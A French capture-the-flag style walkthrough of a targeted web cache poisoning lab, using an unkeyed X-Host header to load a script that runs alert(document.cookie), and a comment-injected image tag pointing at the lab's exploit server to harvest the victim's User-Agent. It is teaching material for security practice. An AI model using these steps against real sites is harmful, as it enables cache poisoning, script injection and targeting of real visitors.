Empoisonnement de cache ciblé via un header inconnu

Targeted web cache poisoning using an unknown header

Empoisonner le cache avec une réponse qui exécute alert(document.cookie) dans le navigateur d’un visiteur, mais uniquement pour un sous-ensemble d’utilisateurs correspondant à la victime.

Observation initiale

On intercepte la requête/réponse.

Avec l’extension Param Miner, on lance la détection des en-têtes exploitables

L’outil révèle un header “secret” : X-Host.

Si on envoie X-Host: test.com, la valeur se retrouve réinjectée dans la réponse (dans un src).

X-Host: test.com

Mise en place de la charge utile

Sur l’Exploit Server, on crée une ressource avec comme chemin/titre :
- /resources/js/tracking.js

Contenu du fichier :

alert(document.cookie)

Empoisonnement du cache (ciblage via X-Host)

On renvoie la requête avec :

X-Host: exploit-0ae9007b03acd9a1802ccfa901070019.exploit-server.net

La page charge alors le tracking.js depuis l’exploit server, ce qui déclenche l’alerte.

Ciblage de la victime avec le User-Agent

On remarque que la réponse varie selon User-Agent (via Vary), donc pour toucher la victime il faut connaître son UA.

On poste un commentaire qui force un chargement vers l’exploit server :

<img src="https://exploit-0ae9007b03acd9a1802ccfa901070019.exploit-server.net/">

Dans les logs de l’exploit server, on récupère le User-Agent de la victime :

Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36

Mis à jour il y a 2 mois

hashtagTargeted web cache poisoning using an unknown header

hashtagObservation initiale

hashtagMise en place de la charge utile

hashtagEmpoisonnement du cache (ciblage via X-Host)

hashtagCiblage de la victime avec le User-Agent

Targeted web cache poisoning using an unknown header

Observation initiale

Mise en place de la charge utile

Empoisonnement du cache (ciblage via X-Host)

Ciblage de la victime avec le User-Agent